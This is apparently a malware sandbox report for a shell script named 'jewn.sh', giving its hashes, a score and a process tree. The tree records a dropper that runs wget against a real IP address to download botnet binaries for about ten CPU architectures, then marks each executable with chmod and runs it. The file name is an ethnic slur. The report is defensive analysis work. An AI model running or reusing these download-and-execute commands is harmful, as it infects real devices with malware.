fc888d0e281f668aa43f5b266eaf0f69edd56eb7c47d32a005de9ab268fc8645

Analysis

max time kernel
0s
max time network
124s
platform
debian-9_mipsel
resource
debian9-mipsel-20221111-en
resource tags

arch:mipselimage:debian9-mipsel-20221111-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
submitted
08-02-2023 06:31

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

jewn.sh
Size

1KB
MD5

2097bb27333c25ce9708e90de1604d99
SHA1

5e26a804a9ee8922e12e8eb3aab85cdd83235ebb
SHA256

fc888d0e281f668aa43f5b266eaf0f69edd56eb7c47d32a005de9ab268fc8645
SHA512

7417d2e7a5c2266038244ccf0c9efcc6007766e10221f8fc65f74bc5559e060d0d0ee771cd8eaaf9db5269d4cf1af84bc07f65dff60a89d64565a721dd64eb53

Score

5^/10

Malware Config

Signatures

Writes file to tmp directory 1 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
/tmp/jewn.sh	/tmp/jewn.sh	jewn.sh

/tmp/jewn.sh
/tmp/jewn.sh
1⤵
- Writes file to tmp directory
PID:325
- /usr/bin/wget
  wget http://194.180.48.156/bins/jew.x86
  2⤵
  PID:326
- /bin/cat
  cat jew.x86
  2⤵
  PID:332
- /bin/chmod
  chmod +x jewn jewn.sh systemd-private-932f9166061f4d2c9f76eb5ba3be72cb-systemd-timesyncd.service-3xOKm7
  2⤵
  PID:333
- ./jewn
  ./jewn
  2⤵
  PID:334
- /usr/bin/wget
  wget http://194.180.48.156/bins/jew.mips
  2⤵
  PID:336
- /bin/cat
  cat jew.mips
  2⤵
  PID:338
- /bin/chmod
  chmod +x jewn jewn.sh systemd-private-932f9166061f4d2c9f76eb5ba3be72cb-systemd-timesyncd.service-3xOKm7
  2⤵
  PID:339
- ./jewn
  ./jewn
  2⤵
  PID:340
- /usr/bin/wget
  wget http://194.180.48.156/bins/jew.mpsl
  2⤵
  PID:342
- /bin/cat
  cat jew.mpsl
  2⤵
  PID:344
- /bin/chmod
  chmod +x jewn jewn.sh systemd-private-932f9166061f4d2c9f76eb5ba3be72cb-systemd-timesyncd.service-3xOKm7
  2⤵
  PID:345
- ./jewn
  ./jewn
  2⤵
  PID:346
- /usr/bin/wget
  wget http://194.180.48.156/bins/jew.arm4
  2⤵
  PID:348
- /bin/cat
  cat jew.arm4
  2⤵
  PID:350
- /bin/chmod
  chmod +x jewn jewn.sh systemd-private-932f9166061f4d2c9f76eb5ba3be72cb-systemd-timesyncd.service-3xOKm7
  2⤵
  PID:351
- ./jewn
  ./jewn
  2⤵
  PID:352
- /usr/bin/wget
  wget http://194.180.48.156/bins/jew.arm5
  2⤵
  PID:354
- /bin/cat
  cat jew.arm5
  2⤵
  PID:356
- /bin/chmod
  chmod +x jewn jewn.sh systemd-private-932f9166061f4d2c9f76eb5ba3be72cb-systemd-timesyncd.service-3xOKm7
  2⤵
  PID:357
- ./jewn
  ./jewn
  2⤵
  PID:358
- /usr/bin/wget
  wget http://194.180.48.156/bins/jew.arm6
  2⤵
  PID:360
- /bin/cat
  cat jew.arm6
  2⤵
  PID:362
- /bin/chmod
  chmod +x jewn jewn.sh systemd-private-932f9166061f4d2c9f76eb5ba3be72cb-systemd-timesyncd.service-3xOKm7
  2⤵
  PID:363
- ./jewn
  ./jewn
  2⤵
  PID:364
- /usr/bin/wget
  wget http://194.180.48.156/bins/jew.arm7
  2⤵
  PID:366
- /bin/cat
  cat jew.arm7
  2⤵
  PID:368
- /bin/chmod
  chmod +x jewn jewn.sh systemd-private-932f9166061f4d2c9f76eb5ba3be72cb-systemd-timesyncd.service-3xOKm7
  2⤵
  PID:369
- ./jewn
  ./jewn
  2⤵
  PID:370
- /usr/bin/wget
  wget http://194.180.48.156/bins/jew.ppc
  2⤵
  PID:372
- /bin/cat
  cat jew.ppc
  2⤵
  PID:374
- /bin/chmod
  chmod +x jewn jewn.sh systemd-private-932f9166061f4d2c9f76eb5ba3be72cb-systemd-timesyncd.service-3xOKm7
  2⤵
  PID:375
- ./jewn
  ./jewn
  2⤵
  PID:376
- /usr/bin/wget
  wget http://194.180.48.156/bins/jew.m68k
  2⤵
  PID:378
- /bin/cat
  cat jew.m68k
  2⤵
  PID:380
- /bin/chmod
  chmod +x jewn jewn.sh systemd-private-932f9166061f4d2c9f76eb5ba3be72cb-systemd-timesyncd.service-3xOKm7
  2⤵
  PID:381
- ./jewn
  ./jewn
  2⤵
  PID:382
- /usr/bin/wget
  wget http://194.180.48.156/bins/jew.sh4
  2⤵
  PID:384
- /bin/cat
  cat jew.sh4
  2⤵
  PID:386
- /bin/chmod
  chmod +x jewn jewn.sh systemd-private-932f9166061f4d2c9f76eb5ba3be72cb-systemd-timesyncd.service-3xOKm7
  2⤵
  PID:387
- ./jewn
  ./jewn
  2⤵
  PID:388

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads